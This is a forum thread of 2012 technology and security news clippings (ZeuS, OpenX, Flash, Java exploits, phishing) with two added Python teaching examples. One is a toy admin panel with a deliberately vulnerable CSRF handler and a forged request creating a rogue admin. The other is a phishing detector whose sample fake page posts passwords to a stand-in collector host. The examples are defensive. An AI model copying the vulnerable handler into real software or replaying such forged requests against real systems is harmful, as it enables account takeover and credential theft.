"Young children have become a popular target for criminals because they 'present a clean slate,'" writes MidlandsConnect.com's Kara Durrette. "Their identities are not tied to credit cards, student loans, or other lines of credit, which means loss can go undetected for years, according to the report."

"It's important for parents to understand that child ID theft is a real and growing trend," AllClear ID CEO Bo Holland said in a statement. "Rather than letting this trend continue, consumers -- parents especially -- should take the necessary precautions to ensure the safety of their child's livelihood."

http://www.esecurityplanet.com/hackers/study-finds...

--
mogs CClip 30
Expert Contributor 5th May, 2012 19:56
Google Notifies ZeuS Botmasters That Microsoft Is Coming for Them

Google has started sending notifications to the individuals that Microsoft appointed as being behind the ZeuS botnet they've disrupted. Some applaud this decision, while others say that the company’s “one-size-fits-all” privacy policy isn’t the best way to handle things.

Microsoft’s recent takedown of the ZeuS botnet has caused a lot of controversy, mostly because of the way the company addressed the issue.

In April, security journalist Brian Krebs reported that a large part of the security industry blamed Microsoft for using sensitive information for its own agenda without explicit permission from the source, possibly even interfering with the investigations of international law enforcement organizations.

The other problem was that the Redmond company made a deal with a federal judge that would allow it to seize domain names and servers in return for trying to reveal the identities of the suspected cybercriminals.

Now, Krebs reveals that at least 15 of the individuals had email accounts on Hotmail or MSN, which were not a problem to track down, but among the other ones, 39 John Does owned Google accounts.

When Microsoft requested Google to hand over the account information, Google’s privacy policy kicked in and, as a result, all the individuals received notices.

“Google has received a subpoena for information related to your Google account in a case entitled Microsoft Corp., FS-ISAC, Inc. and NACHA v. John Does 1-39 et al., US District Court, Northern District of California, 1:12-cv-01335 (SJ-RLM) (Internal Ref. No. 224623),” reads part of the notice sent by Google.

“To comply with the law, unless you provide us with a copy of a motion to quash the subpoena (or other formal objection filed in court) via email at google-legal-support@google.com by 5pm Pacific Time on May 22, 2012, Google may provide responsive documents on this date.”

While many may applaud Google’s decision to stick to its privacy policy, there are some who believe that the company should have taken the time to check if the customers in question deserved the heads-up.

Jon Praed, founding partner of Internet Law Group, has stated that Microsoft should have done a better job in respecting the community, but on the other hand he welcomes the efforts the firm has placed into this operation.

“Privacy needs lots of attention as an issue, and it is clearly true that the average, law-abiding citizen is generally woefully protected wrt privacy,” Praed wrote in a comment to Krebs’ article.

“However, it is also true that the average bad guy is vastly over-protected by simplistic applications of privacy policies that were written, not to protect the bad guy, but to protect the rest of us. Privacy policies need exceptions, and the general public needs to understand enforcing those exceptions are sometimes as important as enforcing the general rule.”

http://news.softpedia.com/news/Google-Notifies-Zeu...

--
mogs CClip 31
Expert Contributor 6th May, 2012 08:07
Bodleian uses crowd-sourcing to catalogue music collection

The Bodleian Library is asking the public for help in cataloguing one of its collections. As part of a new project, members of the public are being asked to help describe 4,000 music pieces from the Bodleian Libraries' collections.
What's the score at the Bodleian? is the first crowd-sourcing project undertaken by the Bodleian Libraries. About 4,000 pieces of popular piano music from the mid-Victorian period have been digitized and made available online. The music was mostly produced for domestic entertainment, and many of these scores have illustrated or decorative covers and advertisements. The collection has never been included in the library’s catalogue, and its exact contents are therefore unknown.
By visiting the website, 'citizen librarians' can help by describing the scores and contributing to the creation of an online catalogue. Members of the public – with or without musical backgrounds – will be given images of the scores, which they can catalogue by submitting an online form describing the item. The project will also encourage performances of this music and will aim to provide links to audio or video recordings.

Read more at :-
http://phys.org/news/2012-05-bodleian-crowd-sourci...

--
mogs CClip 32
Expert Contributor 6th May, 2012 08:13
Email 'vacations' decrease stress, increase concentration, researchers say

Being cut off from work email significantly reduces stress and allows employees to focus far better, according to a new study by UC Irvine and U.S. Army researchers.
Heart rate monitors were attached to computer users in a suburban office setting, while software sensors detected how often they switched windows. People who read email changed screens twice as often and were in a steady "high alert" state, with more constant heart rates. Those removed from email for five days experienced more natural, variable heart rates.

More at :-
http://phys.org/news/2012-05-email-vacations-decre...

--
mogs CClip 33
Expert Contributor 6th May, 2012 08:19
Nearly 13 Million U.S. Facebook Users Fail to Use Privacy Controls

A Consumer Reports study has found that many members share sensitive data that could be used against them.

By Jeff Goldman | May 04,

According to a recent report from Consumer Reports, almost 13 million U.S. Facebook users either don't use any privacy controls or aren't aware that they're available.

"The magazine also reported that a significant number of members have shared potentially sensitive information that could be used against them," writes The Chicago Tribune's Wailin Wong. "For example, 4.7 million have clicked 'Like' on pages about health conditions or treatments, which Consumer Reports said 'an insurer might use against you.' And 20.4 million included their birth date and year in their profile."

"Facebook really is changing the way the world socially communicates and has become a successful service in part by leveraging copious amounts of personal data that can be spread far wider than its users might realize," Consumer Reports technology editor Jeff Fox said in a statement. "Our investigation revealed some fascinating, and some disquieting trends -- but ones always worth knowing for consumers who wish to keep their personal data under better control."

More at :-
http://www.esecurityplanet.com/network-security/ne...

--
mogs CClip 34
Expert Contributor 6th May, 2012 08:31
OpenX Plans Fix for Security Flaw

Company CTO Michael Todd says a new version will be released early next week.

By Jeff Goldman

Krebs on Security's Brian Krebs reports that hackers are actively exploiting an unpatched vulnerability in the OpenX ad server solution in order to run ads that serve malware and browser exploits.

"Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts," Krebs writes. "That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software. OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts."

"The first compromised systems were discovered by Infosec researcher Mark Baldwin, who found that attackers were exploiting a cross-site request forgery (CSRF) vulnerability to create a malicious 'openx-manager' account on affected systems and then started serving ads with malicious payloads via the OpenX platform," The H Security reports. "This account gets created by JavaScript executed when a legitimate administrator logs into the advertising platform and is served an ad in the administration interface that comes from OpenX's own advertising servers."

Krebs says OpenX CTO Michael Todd hopes to roll out an official fix as soon as possible -- in the interim, Todd has posted a list of steps for users to take to protect their systems. "What we’re going to do early next week -- on Monday or Tuesday -- is release a new version of OpenX for people to download as soon as possible," Todd said. "We’re taking an extra few days to make sure that this gets done correctly and that we’re doing all the testing we need to do before we push that out."

http://www.esecurityplanet.com/network-security/op...

--
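An added example, not part of the post above, the quoted reports or OpenX's code: a toy admin panel showing why the account creation described in CClip 34 succeeds when the session cookie is the only check, and how an Origin check plus a per-session token rejects the same request. The class, host names and request layout are hypothetical; only the account name "openx-manager" comes from the quoted report.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # per-deployment secret, never sent to the browser


def csrf_token_for(session_id: str) -> str:
    """Token bound to one session; rendered only into the panel's own forms."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


class AdminPanel:
    """Toy model of an ad-server admin interface (hypothetical, not OpenX code)."""

    def __init__(self, trusted_origin: str):
        self.trusted_origin = trusted_origin
        self.sessions = {}        # session id -> logged-in admin
        self.admins = {"alice"}

    def login(self, user: str) -> str:
        if user not in self.admins:
            raise PermissionError("unknown admin")
        session_id = secrets.token_hex(16)
        self.sessions[session_id] = user
        return session_id

    def create_admin_vulnerable(self, request: dict) -> bool:
        # Cookie is the only check, and the browser attaches it to every
        # request for this host, including ones the admin never intended.
        if request.get("cookie") not in self.sessions:
            return False
        self.admins.add(request["form"]["username"])
        return True

    def create_admin_hardened(self, request: dict) -> bool:
        session_id = request.get("cookie")
        if session_id not in self.sessions:
            return False
        # 1. The state-changing request must originate from the panel itself.
        if request.get("origin") != self.trusted_origin:
            return False
        # 2. It must carry the token tied to this session (constant-time compare).
        supplied = str(request.get("form", {}).get("csrf_token", ""))
        expected = csrf_token_for(session_id)
        if not hmac.compare_digest(supplied.encode(), expected.encode()):
            return False
        self.admins.add(request["form"]["username"])
        return True


def demo():
    """Replay one forged and one legitimate request against both handlers."""
    panel = AdminPanel("https://admin.example")
    session_id = panel.login("alice")

    # Constructed request as sent by script from an ad: cookie present, no token.
    forged = {"cookie": session_id, "origin": "https://ads.example",
              "form": {"username": "openx-manager"}}
    # Constructed request submitted from the panel's own form.
    legit = {"cookie": session_id, "origin": "https://admin.example",
             "form": {"username": "bob", "csrf_token": csrf_token_for(session_id)}}

    results = {
        "hardened_forged": panel.create_admin_hardened(forged),
        "hardened_legit": panel.create_admin_hardened(legit),
        "vulnerable_forged": panel.create_admin_vulnerable(forged),
    }
    return results, sorted(panel.admins)


if __name__ == "__main__":
    print(demo())
```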
mogs CClip 35
Expert Contributor 6th May, 2012 08:39
Intel and McAfee unveil plans for unified security future

After 18 months, the results are in
By Iain Thomson in San Francisco

Posted in Cloud, 5th May 2012 02:01 GMT
Intel and McAfee have been talking about the fruits of their merger and their plans for a cloud to computer security network that will be built into new systems.

Jason Waxman, general manager of Intel's Cloud Infrastructure Group, said that over the last year or so he'd been inundated with questions about what Intel was going to do with McAfee since it lashed out $7.68bn for the security firm, during an industry-wide buying spree on cyber-security companies. Chipzilla's been intentionally quiet on the subject, but was now ready to talk, he said.

What Intel is planning is a cloud to desktop security strategy, mixing hardware and software features in a federated framework designed to make cloud computing safer, locking down the desktop and, coincidentally, giving IT managers another reason to specify Intel's systems during the next upgrade cycle.

More at :-
http://www.theregister.co.uk/2012/05/05/intel_mcaf...

--
mogs CClip 36
Expert Contributor 6th May, 2012 08:44
Microsoft ejects DVD playback from Windows 8

Netflix and licensing killed the video star
By Gavin Clarke

Posted in Operating Systems, 4th May 2012 11:01 GMT
Digital media playback in Windows 8 has fallen casualty to the savage economics of the PC industry and changing tastes in consumer viewing.

We knew Windows Media Center would be sold at extra cost in Windows 8, but Microsoft now says you won’t be able to play DVDs on Windows Media Player in Windows 8.

If you do want DVD playback, then it’ll be a case of shopping judiciously and picking a PC whose manufacturer has licensed the codecs from a third party.

The twist? Windows 8 customers will end up paying more than others, as PC makers will likely be compelled to license the required codecs themselves to enable DVD playback.

In the latest Windows 8 blog, Microsoft said:

Windows Media Player will continue to be available in all editions, but without DVD playback support. For optical discs playback on new Windows 8 devices, we are going to rely on the many quality solutions on the market, which provide great experiences for both DVD and Blu-ray.

More at :-
http://www.theregister.co.uk/2012/05/04/windows_me...

--
mogs CClip 37
Expert Contributor 6th May, 2012 09:13
Try a free security suite with Bitdefender Total Security 2012
A 30-day trial version that enables you to test the software fully
Computeractive staff Download review Security 02/05/2012

Bitdefender's Auto Pilot tool keeps user management of PC security to the bare minimum

Bitdefender Total Security 2012 is the package that offers the company's highest level of protection against online threats, with the same ease of use that is built into its full range of security products.
This download gives home PC owners the chance to evaluate the software completely free of charge for 30 days.
Total Security 2012 features an Auto Pilot mode that takes the hassle out of maintaining online security, with no pop-ups, no alerts and nothing to configure.
For those who prefer to manage PC security themselves, Total Security 2012 offers plenty of flexible tools, including parental controls that keep mum and dad in charge of the PC.
Whether you decide to switch Auto Pilot on or off, Bitdefender's social media filtering tools will block suspicious links in Facebook and Twitter windows, as well as blocking ID theft attempts.
As a free trial of the full software rather than a feature-restricted version, this download is worthy of our Try It award. You can also read our full and independent review of Bitdefender Total Security 2012.


Read more: http://www.computeractive.co.uk/ca/download-review...


--
mogs CClip 38
Expert Contributor 6th May, 2012 09:20
Will my router keep working once IPv6 has launched later this year?
The latest internet protocol, IPv6, is due this summer, however this should not cause any lack of accessibility to websites for those using IPv4 equipment
Computeractive staff PC help Broadband 01/05/2012

The big changeover to IPv6 is on 6 June this year
Q I have just read about the World IPv6 Launch day, which is scheduled for 6 June 2012. I used a recommended program to test my setup for compatibility and I have discovered that my router does not support IPv6 connectivity.
Does this mean that after 6 June I will not be able to access the internet as fully as I do now? From what I’ve read it seems there will be sites that only support IPv6 and that I will not see these, thus reducing my access.
My internet service provider (ISP) says I can overcome this problem by buying a new router but I am paying for its top broadband service. It seems to me that if this is correct I would be better off by changing my service.
Howard Angel
A We would have to devote several pages of the magazine to answer this question in detail (and indeed, we’ll do that as IPv6’s launch draws close – so look out for the article). So the short answer is that, for the near future at least, you have little to worry about.
When the IPv6 protocol launches later this year, IPv4 equipment will continue to work as normal. In the longer term – and we are talking years – it is possible that your router will be unable to access certain websites, so you may wish to consider a replacement.
If you object to having to spend this money then we’re sure that by the time it becomes a problem, all new routers – including those supplied by ISPs as part of a broadband package – will offer comprehensive support for IPv6.


Read more: http://www.computeractive.co.uk/ca/pc-help/2155992...


--
mogs CClip 39
Expert Contributor 6th May, 2012 09:27
Check your documents and essays for style, content and plagiarism
A free service can check the spelling, grammar, content and style of your documents. It can also tell if you've been using someone else's words
Computeractive staff Step by step Web 02/05/2012

One of the beauties of the Paper Rater service is that there’s nothing to sign up to or download – just fire up a web browser and visit the Paper Rater website. When the site appears, have a look round to see what’s on offer. Notice that there’s a Pricing button at the top of the page: all the features on the site are free, though a paid-for ‘premium’ service is set to launch. However, we’ll be focusing solely on the free tools. When you’re ready to start, click the Use Now FREE button to get going.


Read more: http://www.computeractive.co.uk/ca/step-by-step/21...


--
mogs CClip 40
Expert Contributor 6th May, 2012 21:24
Chrome App Translates Portions of Pages So You Can Learn While Browsing

There are plenty of ways of learning a new language, but none are as good as living in a place where everyone speaks it around you. Of course, moving to a new country probably isn't the most efficient way of picking up a new language.

Immersion for Chrome helps to solve the problem by surrounding you with the foreign language of your choosing while you surf.

It leverages Google Translate and actively replaces words or even entire sentences in the articles you read online with their foreign translation.

You can choose between a Novice level, which replaces only a few words, all the way up to Fluent which replaces big portions of text. It's surprisingly easy and effective in practice.

You can even set it to speak the translated parts so you can hear how they're pronounced as well.

http://news.softpedia.com/news/Chrome-App-Substitu...

--
mogs CClip 41
Expert Contributor 7th May, 2012 11:08
Apple engineering mistake exposes clear-text passwords for Lion
An attacker could potentially decrypt information secured with an older version of FileVault, Apple's encryption technology

By Jeremy Kirk
May 6, 2012 09:47 PM ET
IDG News Service - Apple's latest update to OS X contains a dangerous programming error that reveals the passwords for material stored in the first version of FileVault, the company's encryption technology, a software consultant said.

David I. Emery wrote on Cryptome that a debugging switch inadvertently left on in the current release of Lion, version 10.7.3, records in clear text the password needed to open the folder encrypted by the older version of FileVault.

Users who are vulnerable are those who upgraded to Lion but are using the older version of FileVault. The debug switch will record the Lion passwords for anyone who has logged in since the upgrade to version 10.7.3, released in early February.

More at :-
http://www.computerworld.com/s/article/9226916/App...

--
mogs CClip 42
Expert Contributor 7th May, 2012 11:15
Hackers Blackmail Symantec, Claim to Have Norton Internet Security 2012 Code

On May 4, a group of hackers calling itself “l3g4nd crew” claimed to be in possession of Symantec’s Norton Internet Security 2012 source code. They tried to blackmail the security firm, but Symantec representatives determined that the code was not from their products.

This is not the first time Symantec has been blackmailed by hackers. A few weeks ago, a similar incident took place. At the time, the company sought help from US law enforcement in an attempt to unmask the hacker.

If back then the hackers claimed to be hacktivists that wanted to teach Symantec a lesson, this time the blackmailers seem to be in it purely for the money.

“We would like to inform you that we finally exploited Norton internet security 2012, this exploit made an error in Norton and by mistake exposed its FULL SOURCE CODE, we then checked it several time to be sure, also we would like to tell you that you fool highness inserted a lot of sensitive information in the code,” the hackers wrote.

“We actually disclosed the top secret virus protection technique of Symantec Norton 2012 and we will be publishing it on Monday unless we had a little t$lk, the source code will also be published on several paste websites including this site.”

They threatened that the code would be leaked on Monday, which is today, if their “demand$” were not met.

However, according to Infosec Island, Symantec denies that the source code is from Norton Internet Security 2012. Senior Manager for Corporate Communications at Symantec, Cris Paden, has revealed that the code comes from a “utility designed to keep Microsoft Office 2010 in a perpetual trial mode.”

Read more at :-
http://news.softpedia.com/news/Hackers-Blackmail-S...

--
mogs CClip 43
Expert Contributor 7th May, 2012 11:29
Internet group: Quality over speed in new domains
May 6, 2012 By ANICK JESDANUN, AP Technology Writer
(AP) -- The organization in charge of expanding the number of Internet address suffixes - the ".com" part of domain names - is apologizing for delays but says it's favoring "quality, not speed."
Three weeks ago, the Internet Corporation for Assigned Names and Numbers abruptly shut down a system for letting companies and organizations propose new suffixes, after it discovered a software glitch that exposed some private data. At the time, ICANN planned to reopen the system within four business days. The system remains suspended indefinitely.
"We're very focused on the quality of what we do," ICANN CEO Rod Beckstrom said. "We take this very seriously. That's why we're moving very methodologically and professionally."
In an interview with The Associated Press this week, Beckstrom added, "We apologize for the delay, but we're committed to getting this right."
ICANN has said it needed time to figure out why the software failed and how to fix it. That was completed last week, Beckstrom said, but ICANN still must undergo extensive testing on the fixes and inform companies and organizations whose data had been exposed. He declined to offer a timetable; ICANN said Friday that it planned to provide an update after Tuesday.
Up to 1,000 domain name suffixes could be added each year in the most sweeping change to the domain name system since its creation in the 1980s.

More at :-
http://phys.org/news/2012-05-internet-group-qualit...

--
mogs CClip 44
Expert Contributor 7th May, 2012 17:06
Security App of the Week: M Portable Anti-Copy

Software programmer Mohsen Ektefa introduces “M Portable Anti-Copy,” an application that can be used to protect content stored on portable storage devices such as USB memory sticks, or portable hard drives. The software represents a great way for copyright holders to protect their assets.

“This is the first and the only software in the world that can protect your files from copy, cut, upload and attach on a portable storage device,” the developer told us.

“So if you are a file owner, you can protect your files using M Portable Anti-Copy and save them directly into your portable storage, and sell it to your customers. Then, only your customers can run the files on the portable storage and if any user copies the files from the portable disks to her/his storage and run them, they will delete automatically.”

For instance, if someone wants to commercialize e-books on USB memory sticks, he/she can make sure that only the individual that possesses the drive can read it.

Read more at :-
http://news.softpedia.com/news/M-Portable-Anti-Cop...

--
mogs CClip 45
Expert Contributor 7th May, 2012 17:16
Adobe preps silent Flash updates for Macs
Flash Player 11.3 hits beta 3; final to ship before end of June

By Gregg Keizer | Computerworld US | 07 May 12
Adobe last week released a new beta of Flash Player that includes silent updates for Macs.

Adobe first included silent updates for OS X in the Flash Player beta a month ago; the version shipped Friday was tagged as "Beta 3."

Adobe introduced silent updates for Flash Player on Windows in late March. At the time, the company committed to creating the same feature on OS X, but did not set a timetable.

As far as users are concerned, the Mac version is identical to the Windows tool: It pings Adobe's servers every hour until it gets a response. If it reaches Adobe and finds no ready update, the tool re-checks the servers 24 hours later. Found updates, however, are applied entirely in the background, and do not display notices on the screen or require the user to take any action.

By default, Flash 11.3 has silent updates switched on, but users can change the setting to continue to receive on-screen alerts.

Read more: http://www.pcadvisor.co.uk/news/security/3356030/a...

--
mogs CClip 46
Expert Contributor 7th May, 2012 17:21
PHP working on new patch for critical vulnerability after initial one failed
Upcoming PHP updates will address two known remote code execution vulnerabilities

By Lucian Constantin | 07 May 12
The PHP Group plans to release new versions of the PHP processor on Tuesday in order to patch two publicly known critical remote code execution vulnerabilities, one of which was improperly addressed in a May 3 update.



Read more: http://www.pcadvisor.co.uk/news/security/3356029/p...

--
mogs CClip 47
Expert Contributor 7th May, 2012 21:29
OpenID-Style Websites Trick Users into Handing Over Credentials

Barracuda Labs experts have come across spam emails that lure users to a malicious site that tries to replicate a service similar to OpenID, hoping to gain the trust of potential victims.

OpenID is considered to be a practical solution by many website owners because it saves them the hassle of creating their own user accounts, and instead, allows the customers to log in with credentials utilized to access other sites, such as Yahoo, Gmail, Twitter, or Facebook.

Cybercriminals rely on the fact that many people don’t know how the procedure works, so they may be tempted to provide their credentials without giving it too much thought.

Usually, the schemes start with an apparently innocent email that informs the recipient about a real estate deal, or a package delivery notification. When the link from the message is clicked, the user is taken to a fake OpenID login site.

Once the service is selected, a login screen that partly imitates the legitimate one appears.

After the victims enter their credentials and press the Sign In button, the username and password are immediately transferred, in plain text, to a server controlled by the cybercriminals. To avoid raising suspicion, a redirect then occurs to a legitimate site.

At this point, it doesn’t matter if the victim handed over Facebook, Gmail, AOL, Yahoo, or Windows Live login details. Any one of them can be worth just as much to the scammers.

Users are advised to keep in mind that websites that utilize OpenID always redirect to the legitimate secure domain. For instance, if you choose to sign in to your Yahoo account, you will be taken to the company’s genuine site.

When presented with something similar to the screenshot, you can be almost certain that it’s a phishing operation.

http://news.softpedia.com/news/OpenID-Style-Websit...



--
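The advice in the clip above, that a genuine OpenID sign-in always ends up on the provider's own secure domain, written as a check a mail gateway or proxy sandbox could run on a fetched page. This is an added example, not part of the original post or the quoted article; the provider host allow-list, the sample pages and all function names are assumptions made for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed allow-list of sign-in hosts per provider; maintain it from each
# provider's own documentation before relying on it.
PROVIDER_HOSTS = {
    "google": {"accounts.google.com"},
    "yahoo": {"login.yahoo.com"},
    "facebook": {"www.facebook.com"},
    "windows live": {"login.live.com"},
}


def is_provider_url(url, provider):
    """True only for an HTTPS URL whose host is exactly a known sign-in host."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    # .hostname drops any "user@" prefix and the port, and lower-cases the host,
    # so "https://login.yahoo.com@other.example/" resolves to other.example.
    host = (parts.hostname or "").rstrip(".")
    return host in PROVIDER_HOSTS.get(provider.lower(), set())


class PasswordFormFinder(HTMLParser):
    """Collects the action attribute of every form holding a password field."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self._action = None          # action of the form currently open, if any
        self._has_password = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.flush()             # tolerate a previous form left unclosed
            self._action = attrs.get("action") or ""
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            if self._action is None:
                # Field outside any form: treat it as submitted to the page itself.
                self.actions.append("")
            else:
                self._has_password = True

    def handle_endtag(self, tag):
        if tag == "form":
            self.flush()

    def flush(self):
        if self._action is not None and self._has_password:
            self.actions.append(self._action)
        self._action, self._has_password = None, False


def audit_login_page(page_url, html, provider):
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    finder = PasswordFormFinder()
    finder.feed(html)
    finder.close()
    finder.flush()                   # account for a form never closed in the markup
    if not finder.actions:
        return []                    # the page asks for no password
    findings = []
    if not is_provider_url(page_url, provider):
        host = urlsplit(page_url).hostname
        findings.append(f"password requested on {host!r}, "
                        f"not on a {provider} sign-in host over HTTPS")
    for action in finder.actions:
        target = urljoin(page_url, action)   # an empty action posts back to the page
        if not is_provider_url(target, provider):
            findings.append(f"credentials would be posted to {target}")
    return findings


# Constructed sample pages (not captured from any real site).
GENUINE_URL = "https://login.yahoo.com/"
GENUINE_HTML = ('<form method="post" action="/account/challenge/password">'
                '<input type="text" name="username">'
                '<input type="password" name="password"></form>')

FAKE_URL = "http://openid-signin.example/login?svc=yahoo"
FAKE_HTML = ('<form method="post" action="http://collector.example/save">'
             '<input type="text" name="user">'
             '<input type="password" name="pass"></form>')

LOOKALIKE_URL = "https://login.yahoo.com.openid-signin.example/"
LOOKALIKE_HTML = ('<form action="signin"><input type="password" name="p">')

if __name__ == "__main__":
    for url, html in ((GENUINE_URL, GENUINE_HTML), (FAKE_URL, FAKE_HTML),
                      (LOOKALIKE_URL, LOOKALIKE_HTML)):
        print(url, "->", audit_login_page(url, html, "yahoo") or "ok")
```

Exact host matching is deliberate: suffix or substring matching is what lookalike hosts such as the third sample rely on.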
mogs CClip 48
Expert Contributor 8th May, 2012 16:36

So many recent exploits have used Java as their attack vector, you might conclude Java should be shown the exit

By Roger A. Grimes | InfoWorld

Java's direct responsibility in the recent Mac Flashback Trojan attacks has many calling for Java's retirement, including InfoWorld's own Woody Leonhard.

It's understandable. Unpatched Java is responsible for a sizable proportion of today's successful Internet browser attacks, including two compromises I've suffered over the last couple of years. It's also been the culprit behind nearly every Windows exploit that's affected friends and family, aside from the pure social engineering exploits from phishing, Craigslist scams, and so on.

Those anecdotal experiences are backed up by good data. Microsoft's Security Intelligence Report 11 shows Java exploits are by far the biggest ongoing problem impacting monitored Windows computers. Java has been bedeviled by hundreds of security vulnerabilities over time. Go to any security vulnerability database and you'll see dozens of bug fixes each year since Java's creation in 1995. You'd be hard-pressed to find any single application that has hosted as many security bugs as Java.

Banishing Java: Easier said than done
Is it time for Java to go? Should we recommend that people disable or remove it? Like most problems in life, the answer isn't an easy yes or no.

One thing is certain: Any software not in use, including Java, should be removed from your system. That's common sense -- and a long-recommended security tenet. It reduces the attack surface for exploits and their creators.

But many enterprises live and thrive on Java -- both pure Java programs and runtime applets running in the browser. They can't remove it. Personally, I've removed Java a few times over the years, though many websites and services I love (like Secunia's Online Software Inspector) require Java. There are enough cool and useful services that depend on Java that I end up reinstalling it.

Read more at :-
http://www.infoworld.com/d/security/why-you-cant-d...

--
mogs CClip 49
Expert Contributor 8th May, 2012 19:36
Adobe Patches Critical Flash Player Security Flaw

All users are urged to update to version 11.2.202.235.

By Jeff Goldman | May 07, 2012
Adobe Systems recently released security updates for Adobe Flash Player for Mac, Windows and Linux. "These updates address an object confusion vulnerability (CVE-2012-0779) that could cause the application to crash and potentially allow an attacker to take control of the affected system," the company stated in a security bulletin published on Friday.

"It’s recommended that users of Adobe Flash Player 11.2.202.233 and earlier versions for Windows, Mac and Linux update to Adobe Flash Player 11.2.202.235," writes Forbes' Adrian Kingsley-Hughes. "You can do this by visiting Adobe’s Flash Player update portal."

"The company said the vulnerability ... has been exploited in targeted attacks designed to trick the user into clicking on a malicious file delivered in an email message, and that the exploit used in the attacks seen so far target Flash Player on Internet Explorer for Windows only," writes Krebs on Security's Brian Krebs.

"For the exploit to successfully work, the malicious attachments need to be opened on a computer with a vulnerable version of Adobe Flash Player," Symantec reports. "The malicious documents contain an embedded reference to a malicious Flash file hosted on a remote server. When the Flash file is acquired and opened, it sprays the heap with shellcode and triggers the CVE-2012-0779 exploit. Once the shellcode gains control, it looks for the payload in the original document, decrypts it, drops it to disk, and executes it. Symantec detects this payload as Trojan.Pasam."

"Vulnerabilities in Adobe's products in general and Flash Player in particular are often exploited by cyber attackers, so the company introduced silent automatic updating for Flash Player on Windows in March, and is working on releasing a stable Flash Player for Mac with the feature soon," writes Help Net Security's Zeljka Zorz.

http://www.esecurityplanet.com/patches/adobe-patch...

--
mogs CClip 50
Expert Contributor 8th May, 2012 19:51
Windows 8 privacy worry overblown, says Microsoft analyst
By Taylor Armerding | CSO | 08 May 12
It sounds like a privacy hole big enough for a truckload of your personal information to be leaked to the world, but experts say a recently disclosed Windows 8 privacy issue is really a non-issue.

Microsoft's Windows 8, which connects its users with networks including Facebook, Flickr, Twitter, LinkedIn, Hotmail, Gmail and Exchange, leaves a "lingering cache of automatically collected contacts [that] are stored unencrypted on a Windows 8 client," InfoWorld's Woody Leonhard reports this week.

"[Windows 8] doesn't build its Contacts list dynamically," Leonhard reports. "Instead, it keeps a cache of contacts from all of those sources stored on the machine. The cache persists even when the user logs off or the machine is turned off."

"That means anyone who can sign on to your PC with an administrator account can see all of your contacts and all of their data -- names, email addresses, pictures, telephone numbers, addresses," he writes.

Read more: http://www.pcadvisor.co.uk/news/security/3356327/w...

--
mogs CClip 51
Expert Contributor 8th May, 2012 20:03

British internet users are being targeted by a 'ransomware' campaign that locks people out of their computers unless they hand over the right amount of money.


Criminals posing as police are demanding money to unlock PCs. Image credit: Abuse.ch

Spotted by security blog Abuse.ch, the malware taps into an exploit kit known as 'Blackhole'. Sold underground, Blackhole is used by criminals to infect computers via security holes in a browser or in third-party plug-ins such as Java and Adobe Reader, Abuse.ch said in its post on Saturday.

If the version of Java, for example, is not up to date with the latest patches, the downloaded file will exploit the software's weakness by downloading a Trojan to the PC and then running it. Once the PC is infected, the user will receive a message on the screen saying that the computer has been locked for illegally downloading pirated music.

More at :-
http://www.zdnet.co.uk/news/security-threats/2012/...

--
mogs CClip 52
Expert Contributor 8th May, 2012 20:08
Mozilla patches leaky add-ons issue
By Tom Espiner, 8 May, 2012 17:20

Mozilla has patched a memory-consumption issue in Firefox caused by leaky add-ons, but has found the patch may not be 100 percent successful.

Mozilla developer Nicholas Nethercote tested a patch by fellow developer Kyle Huey for six add-ons, including McAfee SiteAdvisor 3.4.1, and found the patch reduced incidents of 'zombie compartments'.

However, the patch also caused code built with the Mozilla Add-on SDK to "leak badly". Developers are discussing the issue, Nethercote said in a blog post on Monday.

http://www.zdnet.co.uk/blogs/security-bulletin-100...

--
mogs CClip 53
Expert Contributor 8th May, 2012 22:05
FBI Wants Google, Facebook to Provide Wiretap Backdoor: Report

By: Nathan Eddy
2012-05-07

The FBI wants Facebook, Google and other large Internet companies to build in backdoors to allow wiretapping, CNET reports.

Just in case you weren’t paranoid enough about privacy and security on the Web, a CNET report has revealed that the Federal Bureau of Investigation is pressuring major Internet communications firms to build in backdoors that would allow the bureau to conduct wiretapping investigations. The report said the FBI fears its ability to conduct surveillance as more users employ Web-based communication and messaging services to talk to each other.

The news is unlikely to go down well with Internet freedom groups, which are already alarmed by government proposals to regulate and monitor the Internet. Some argue that building in such a backdoor would be a time-consuming and complex process. "New methods of communication should not be subject to a government green light before they can be used," Ross Schulman, of the Computer and Communications Industry Association, said in the report.

The report also mentions any wiretapping would require a court order before it could be initiated. “What the FBI is proposing is an amendment to the 1994 Communications Assistance for Law Enforcement Act, or CALEA, which would require communications platforms like Facebook and Web email programs like Gmail and Yahoo to build FBI-accessible backdoors into their services,” the article said.

More at :-
http://www.eweek.com/c/a/Security/FBI-Wants-Google...

--
mogs CClip 54
Expert Contributor 8th May, 2012 22:18
Credit company hackers' ransom goes unpaid

Belgian company has reportedly ignored demands for payment to maintain security of customer details.
By Caroline Donnelly, 8 May 2012
A European credit company targeted by computer hackers has reportedly ignored demands for 150,000 Euros in ransom money to protect its customers' details.

Belgian credit provider Elantis has been warned by an unknown hacking group that, unless the ransom money is paid, its customers' confidential information will be published on the internet.

In a statement on text sharing website Pastebin, the group claimed to have obtained personal information belonging to customers that had applied for one of the company’s loans.

The group said they downloaded the details by hacking into Elantis’ servers, and claim the data was unencrypted.

Read more at :-
http://www.itpro.co.uk/640489/credit-company-hacke...

--
mogs CClip 55
Expert Contributor 9th May, 2012 08:15
Dev Channel Update
Tuesday, May 8, 2012 | 18:05
Labels: Dev updates
The Dev channel has been updated to 20.0.1130.1 for Windows, Mac, Linux, and Chrome Frame. This build contains update for V8 - 3.10.8.4 and several stability fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 56
Expert Contributor 9th May, 2012 08:20
